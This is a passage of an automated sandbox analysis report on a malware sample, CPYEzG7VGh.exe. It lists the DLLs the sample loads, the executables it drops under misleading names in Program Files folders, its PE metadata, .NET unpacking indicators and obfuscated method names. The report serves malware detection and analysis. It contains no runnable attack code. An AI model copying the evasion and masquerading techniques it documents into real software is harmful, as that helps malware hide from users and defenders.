Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: wldp.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: profapi.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: sspicli.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: mscoree.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: version.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: wldp.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: profapi.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: sspicli.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: rasapi32.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: rasman.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: rtutils.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: mswsock.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: winhttp.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: dnsapi.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: winnsi.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: secur32.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: schannel.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: mskeyprotect.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: ntasn1.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: ncrypt.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: ncryptsslp.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: msasn1.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: gpapi.dll
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Section loaded: mscoree.dll
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Section loaded: apphelp.dll
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Section loaded: version.dll
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Section loaded: wldp.dll
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Section loaded: profapi.dll
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Section loaded: mscoree.dll
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Section loaded: version.dll
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Section loaded: wldp.dll
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Section loaded: profapi.dll
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Section loaded: sspicli.dll
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: mscoree.dll
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: kernel.appcore.dll
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: version.dll
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: uxtheme.dll
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: windows.storage.dll
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: wldp.dll
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: profapi.dll
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: cryptsp.dll
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: rsaenh.dll
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: cryptbase.dll
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: sspicli.dll

Source: C:\Users\user\Desktop\CPYEzG7VGh.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\surrogateserverreviewsession\Agentserver.exe	Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\uXGucUKOPdf.exe	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\d5489f5e5451db	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Directory created: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Directory created: C:\Program Files\7-Zip\Lang\1a5d5b8dcee3d8	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Directory created: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Directory created: C:\Program Files\Windows NT\d5489f5e5451db	Jump to behavior

Source: CPYEzG7VGh.exe

Static file information: File size 1227432 > 1048576

Source: CPYEzG7VGh.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: CPYEzG7VGh.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: CPYEzG7VGh.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: CPYEzG7VGh.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: CPYEzG7VGh.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: CPYEzG7VGh.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: CPYEzG7VGh.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: CPYEzG7VGh.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: CPYEzG7VGh.exe

Source: CPYEzG7VGh.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: CPYEzG7VGh.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: CPYEzG7VGh.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: CPYEzG7VGh.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: CPYEzG7VGh.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, rDEqSbpCFNNQ5oxsLLj.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, rDEqSbpCFNNQ5oxsLLj.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, TKGeKudtqSKXKDJdtKa.cs	.Net Code: s8rdOciAGn System.AppDomain.Load(byte[])
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, TKGeKudtqSKXKDJdtKa.cs	.Net Code: s8rdOciAGn System.Reflection.Assembly.Load(byte[])
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, TKGeKudtqSKXKDJdtKa.cs	.Net Code: s8rdOciAGn
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, TKGeKudtqSKXKDJdtKa.cs	.Net Code: s8rdOciAGn System.AppDomain.Load(byte[])
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, TKGeKudtqSKXKDJdtKa.cs	.Net Code: s8rdOciAGn System.Reflection.Assembly.Load(byte[])
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, TKGeKudtqSKXKDJdtKa.cs	.Net Code: s8rdOciAGn

Source: C:\Users\user\Desktop\CPYEzG7VGh.exe

File created: C:\surrogateserverreviewsession\__tmp_rar_sfx_access_check_6286328

Jump to behavior

Source: CPYEzG7VGh.exe

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_0038E28C push eax; ret	0_2_0038E2AA
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_0038CAC9 push eax; retf 0038h	0_2_0038CACE
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_0038ED46 push ecx; ret	0_2_0038ED59
Source: C:\surrogateserverreviewsession\dasHost.exe	Code function: 32_2_00007FF848E700BD pushad ; iretd	32_2_00007FF848E700C1
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Code function: 36_2_00007FF848E700BD pushad ; iretd	36_2_00007FF848E700C1
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Code function: 36_2_00007FF848E836CD push ebx; ret	36_2_00007FF848E836FA
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Code function: 37_2_00007FF848E700BD pushad ; iretd	37_2_00007FF848E700C1
Source: C:\surrogateserverreviewsession\dasHost.exe	Code function: 39_2_00007FF848E700BD pushad ; iretd	39_2_00007FF848E700C1

Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, yIiA0ZPJmK7Pc01uL5c.cs	High entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'K3A2QqJdRg', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, JhQoU1PA2GWofjPL49c.cs	High entropy of concatenated method names: 'sJZyvfy7YX', 'dTMynCtFAr', 'Oq1ycsIphT', 'pKNyAhqFZe', 'YyIy0LvRHD', 'BAFy6jFMtvxlQPN6ygM', 'FFnCWdFlt1bUWkQxRwC', 'DxX0o0Fnvt5gTtmKIEF', 'G8BDL9FkijO4kmRipuR', 'zREndKFudRRfU6iMVcI'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, lqtWxUd1C1DrQ8NifNW.cs	High entropy of concatenated method names: 'gUWlkrW2ua', 'WyP0Zd36SPtpD84c9l4', 'gB1NPF39O06irMDCQXm', 'bC8idx3KPgvuJWyKoUw', 'kWYb9H3VO03DSUM4OnP', 'sTlv313zi29fJAuC76E', 'kB5NlhU0DheS0Gdyd5X', 'nHFHKDU1uALyrRY6kuS', 'e6lWvsUH1Pi0S8LX29D', 'DPQp3wUfnowOwvX7C0B'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, xdZeh9x1qShBy8GpM8w.cs	High entropy of concatenated method names: 'BI43fWjnNP', 'WFoyXAQdy9A1oftU61k', 'jUjkrUQjRfd2ujg76OG', 'JoZLCJQcw6llqJHLKDs', 'zsdjuKQeY4jt6vdcTc4', 'GbNbVOQlxd6oIeImvki', 'QLw', 'YZ8', 'cC5', 'G9C'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, GW6k2cxuoWok0T88lYG.cs	High entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'WhEqTBY8bhUD9XhOtsb', 'lVVOgVY474W7J1qWc5e', 'ydaqVvYJ408HvD51kdH', 'kSuRnWYKiGHL9wJpTD6', 'cOS6CeYVcLDi2aiwlYU', 'AcQ6EhY6BNrXFFIUOye'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, Q9YNCqHBaMN3ALBEa5H.cs	High entropy of concatenated method names: 'oYo', '_1Z5', 'uuUh01MH0e', 'DUCIjy2Coi', 'Kj6hGoJXUA', 'WZYOwKex07Nw7oKRt02', 'hJKswSeLlE0CVvFVejk', 'jhXVTheaZI1bcytSvuS', 'sMQ8wXeihcymifgNcU2', 'iBtJ1Ie3ml7hEvmfLm6'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, AWbBNjQtfxX7G9NdPe.cs	High entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'qRNgrwfKHYfR2a0iiAm', 'cV4te0fVVf1FqfqK75v', 'YLUb3cf6bd8QoMJ8WW2', 'an0mJOf9PDShgE2geEj', 'KQR8asfzqwUPwctIGaI', 'lk1vCvr0odrauJLsvLX'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, a17PgQwhGjGAh7Bosh.cs	High entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'G30nqFd1j', 'p8crvEHh0aSUMOOYBfU', 'eGlIWUHTiOoJ6voJlwB', 'bn0mjSHOWmdo901SodL', 'e7AS6pHy0u7O9ZB0N65', 'Civ90kHc4ZAKKbegU5n'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, sRiHDO4Zt2jOx1hoFG.cs	High entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'niJd1TH6CV4lrQJOPkQ', 'iTEeUEH9ZPvmm4JW8b2', 'rTunGhHzSj2gaycIyaL', 'RyNWsgf0EbbmCcAgaqo', 'lfbTOef1CTNbt5oOqOr', 'Gd8dTPfHBu6Do2oRjYZ'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, pTi4iXH0XRL95pcJLR8.cs	High entropy of concatenated method names: 'zVcRVvSUlv', 'jnBR5WZaWA', 'PDORq1bVrJ', 'IbVGDnyvDfP4dQ77Lyv', 'aebO3EyRZNb2V9k0qd9', 'FOImVtyAvInHBWqGyhr', 'AhZ9TdypdDw5AfSmlXO', 'EdVRLh4PgP', 'qKiRW5f7pd', 'sjfRD1I8G1'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, goV6p7Hi4BhbYcEtiek.cs	High entropy of concatenated method names: 'DT4D8t6cM0', 'H9EDf7tvoP', 'Q5cDKJRFlQ', 'AYEDCtR5Hx', 'rH0DMTGoIy', 'ceLIsSySXLZ6KTrj659', 'MTEdT1yYdRLIvwXIRQ7', 'IogiXsyrKUhEhblCJFJ', 'nqbtwmymL4kOj2SMcH1', 'IPSi1GyDYcuFvwBlBEd'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, JpOUtTxAhPOqhQ7jv3t.cs	High entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'QbTTMJD9dcVkpc2XIvP', 'DV215JDzRO4iscniXbP', 'BLUD7hW0rUQZ0YT1cdG', 'mrCQmhW1Jxas2NgqI8H', 'SpdLFMWH9DuFCD27APb', 'H6MeuXWfPe2rdFoPXEb'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, SOxj5MPKLKegiQVuOup.cs	High entropy of concatenated method names: 'B89ywdycDk', 'My5y994FGB', 'q4myrHagKC', 'fvDo02FNrHq1febVKkq', 'xWupVyF7hOtVMfQHDaV', 'EKP7aSFEENQ0jvRIkNl', 'esPI2rFR3ohCBpeXFhB', 'I9MmY1FA2MQ0jQb64uA', 'V6gMNXFvsPE2LiGwJKB', 'yUMQsmFpx9ocn9qOvck'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, DAug8bHcwxGBGQqFx7U.cs	High entropy of concatenated method names: '_223', 'JtXWjvOUkcQu7D2D4Gb', 'p9LX6eOBWrtZmedGHmP', 'ByFRsiOhJiD7nTUg401', 'YKGQt8OTUfMiEP7cHfN', 'FOPNeXOOYSTeDbNMwIr', 'xLYR2EOyFE6TtXCFYxW', 'cYVZ34OcLErhncGEYhN', 'bbMbCuOeqxg1GMu5xpH', 'WPxGrxOd4HQNDlLk2QO'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, H5SWf9RBNFmbpDLgBt.cs	High entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'iuwgZVrUGvOMpGdOgYd', 'sQeqwdrB7w5mP1P94sZ', 'jNEvW8rhZNofrXoqCiH', 'Cg3yfMrTdgYtMRNBF6r', 'Nbx2DirOiIGRA33paYc', 'QphGEFryuoUkWJKYpZu'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, yxlY5rd9XvptVUOYcV4.cs	High entropy of concatenated method names: 'x4djaMeoDS', 'AmfjOUOIgT', 'Jyi5q1adObO3ggL6W1v', 'IASl3PajQADEV6kT6P5', 'EVIBmOackTTLC6rPOXh', 'K3dNh4aeGbhQ4LBtq1m', 'NJ4WKfalLlRNa3untk0', 'djKZkAan9mgXbeqdx4n', 'sKdJEjaMwtFqZ5aY6BT', 'UhRJQhakkXyb1JYpQQu'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, Bi0bRN2GWoWWX13KUbP.cs	High entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, eFv1LhxP9u5CaKTtNQA.cs	High entropy of concatenated method names: 'K55', 'YZ8', '_9yX', 'G9C', 'RvcEUmS2KBx14ui0tew', 'jYl6eeStdeDIELYTwyS', 'Cn4S02S5N4sur2rwuZV', 'ktrA9rSoy24p2vav2wF', 'wN1FoxSs1PQ3nMp0eWr', 'w5Zm5bSq3LBt4pagia9'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, aHFIJM2OFBvBBlEuxTi.cs	High entropy of concatenated method names: 'ISGSj7CMYb', 'cYqSlnOjqy', 'iMUSLJ9eqp', 'zLfMgAl3LGUbmZpue5l', 'RN6vBnlUt6O1fpnghQx', 'kh1NR3lah5YuWDkaYCh', 'usFjeYliZcDVPPlBtD3', 'KieZNZlBt3UIsqT2yqx', 'aaNpBSlhWdVtngEIc3B', 'Gvw0dglT9si66Bk3twu'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, t4FQ9vd6AQX67V4c5Zk.cs	High entropy of concatenated method names: 'PAqW2BF9a0', 'xLLKEuBsaGOSGaU57N7', 'aKbuvdB5UwZgZumSs0f', 'zcHaaGBowrEIdNYASOr', 'bJ8fp2BqFxXU298ABbr', 'a2AwdyB8tL17HSoe53S', 'efAWhdAVyU', 'Pw7WPU0ZEg', 'A1MWH0ZSWY', 'V8oWTkntV1'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, ExKoDFxe04mmmQGC6vf.cs	High entropy of concatenated method names: 'QsCJ3ygkox', 'CaSJJk7geS', 'D2uJdAf9Vt', 'IWnZ90Qql6bHcWhyWgX', 'MJ4K15Q8PaG5ISsTSZs', 'u16m2PQo15SArWS0i5H', 'ynRIwPQstCBsduieWXv', 'zUPKMeQ4cTR0sLZvUAA', 'AkdJwNQJKxgcNMDfygY', 'WQR7BGQKJsyMQThKpsv'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, LbSJq3H2H1fDuJH0GAi.cs	High entropy of concatenated method names: 'PxSWAmTSb9', 'J2VW0Jq6c6', 'iY1W6EkVHb', 'SDFWEODJLt', 'WM8Wi3TK1P', 'd4OWwfJe7I', 'RP5iUVhk1T6qwjse1ce', 'UjZ8qxhnHOZaFbjpQox', 'lRPs3XhMGQMNBICwTiX', 'xyXspEhu8Sj8qX4F9TE'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, qExA5A3Lwp433XFWs2.cs	High entropy of concatenated method names: 'uoRpUb4VC', 'Diu49BVKp', 'v1wuSytkw', 'QkgmXt17855cyEqGj8B', 'dFJxLS1XafTZeKdjQF8', 'ojVAGL1FPEtk3MT05Z0', 'r9vRgC1EsaqT2mhPdLB', 's6x41I1NOu0a3LjsQuS', 'qc5jqk1RyaGkW2Pnh3u', 'P78txC1AZItUlyF6k0B'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, UuuSB9xNQ5SS0DiLBUs.cs	High entropy of concatenated method names: 'cJM3UQ2EBF', 'EQH1K6QFTMXuPHVIHyr', 'e8sWc2Q7uDXgXgwqGgM', 'AHFolKQGjCJ5UZZJJmT', 'g6xGxgQXW93b9eISrgn', 'zhXcRUQEsgOeuOQfV61', '_3Xh', 'YZ8', '_123', 'G9C'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, Pproerdqad9mrULmuBC.cs	High entropy of concatenated method names: 'UirdzmCHUD', 'WfXjYEwuTW', 'wkJj3pYljo', 'QIcjJILahP', 'hZUjdI4ybT', 'BpNjjpl6VZ', 'Y8Fjl1WrHT', 'KukjLd1gM3', 'EKtjWw66hh', 'r93jDV728O'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, jMKhOPvRbt4xktOTbsl.cs	High entropy of concatenated method names: 'PJ1', 'jo3', 'SuHkRuVJeL', 'HJLkINqaBR', 'u8AkerQ6Qh', 'EC9', '_74a', '_8pl', '_27D', '_524'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, rDEqSbpCFNNQ5oxsLLj.cs	High entropy of concatenated method names: 'hiYqe52lJSv1oiXnoY7', 'HVxUZP2n2MhJ4GIBYQP', 'aYgNTQ2dbbRn5YS9f99', 'zqS37n2jJ5eudu2pYhm', 's6TxOve40h', 'LBvO572uAGjF7QA3eCn', 'N71quR2wu1dZumldnxv', 'JvVgrq2gLVqC41V0UPA', 'D9RC1v2C4Vd3rwtnd0r', 'OEj04M2IUICHw5otBTf'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, JA2TM72tXqTgUBbgSVa.cs	High entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, cHhDeVvwOJX7DWI4XIg.cs	High entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'LWU12IUGRl', 'xOi1mf0bn1', 'cJ011PLNmt', 'QhN1bmd0cf', 'yFf1XZpc2M', 'SxB1kNXdCU', 's6ZsCKAFSa6UnJQr4PN'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, Yjy9jkxGiderWSDqUo2.cs	High entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'wURZ89YhvVtvZW8UfPr', 'hu271HYTMrb4mD9c5k5', 'J6rKFrYO03ak3B0FrRg', 'PMdw8vYyy6Ve7DOQuW0', 'QjNqWhYcIHOcHSIpGcn', 'Yw8xJ7YejZeDZ5A6LZa'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, PBO7RMHu9I0eEQ53M4l.cs	High entropy of concatenated method names: 'YFBD9KwXHi', 'TulDr2IOE6', 'We6D7LpmPh', 'DnuHgGO22O5QBj6AXSm', 'D8AlatOtUExY7ykE1di', 'F46gtZO5e0ZiIOwLbA4', 'DwHn3OOoqCYDmHYEmfC', 'tLyWguOs1oV5oM74ASa', 'YVhoNLOqUuboKxUhd5a', 'HeIOWlO8AklBuvhi1RM'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, B19junp7V09LSio7aQ5.cs	High entropy of concatenated method names: 'NaQxygjjno', 'BuSx2s9Uup', 'z5yxmHUl43', 'PoCx11x1Tl', 'BAWxbJkTkI', 'vmvxX9e1ug', 'nqUxkOufg2', 'n04xFJKZtA', 'CiGxxBmEVF', 'l0oxgVu0sR'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, N84fgXD0ZLT8NLppta.cs	High entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'Wc8HTimaKRD1qBW9Jmm', 'rWDsPymiftMUIOTjNYl', 'X8gp9Sm3F3WrbvOMUDR', 'Oqm7MTmUJjDRsnSJEIK', 'kFXhbqmBZwrvIl4R4Z4', 'T18e30mhwrEjggPL6SE'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, CwLO8Xdd9H08mDhVA35.cs	High entropy of concatenated method names: 'ga5JwVtDAn', 'fjXJ9ekepd', 'ScBJrOpffs', 'H7tJ7fi6aO', 'MppJ8dPiQL', 'eQCJfbwpry', 'C4HNDHZUKq9wXot5Gtw', 'aOdKPOZBPL7iqAdZSff', 'OcJPAAZiqoVStAQgVsb', 'PUrJaLZ3AyfZP230WQ6'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, YujteUdVg4t6M841wy9.cs	High entropy of concatenated method names: 'fnDjU3oW1j', 'acTjZavo6j', 'ibPjzo0IJ2', 'nVKlYEBEnh', 'Gcul3iIgPj', 'McglJrBrCj', 'FnDldjeE8l', 'LpTlj9Zp7p', 'a40llCqJcB', 'OD8XrbiJfKXVJ5aBLJ3'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, eNE8bLzN6U51aai1G1.cs	High entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'k3HZe7SfuraLJjRkedm', 'RrEDScSrKqWo6MOjivo', 'wQbQA9SmERSNfl8asuq', 'pY0SL5SSd8hv2gYY9BC', 'ETXiTBSYbLHdKCSGQTB', 'i5wxhRSDWDbmkpjHjf7'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, RWtlTAxbqL3d8a37uTa.cs	High entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'oa7hXYDGJixCDAuuKRj', 'zgJT9JDXiLSr8Xa3BFK', 'BSXcOBDFMw2A09g2lq9', 'Iyy0fmD74omLK3RxGTR', 'i006WmDEsOG5BySwx07', 'dEtC9sDNJnko8QhRKUL'
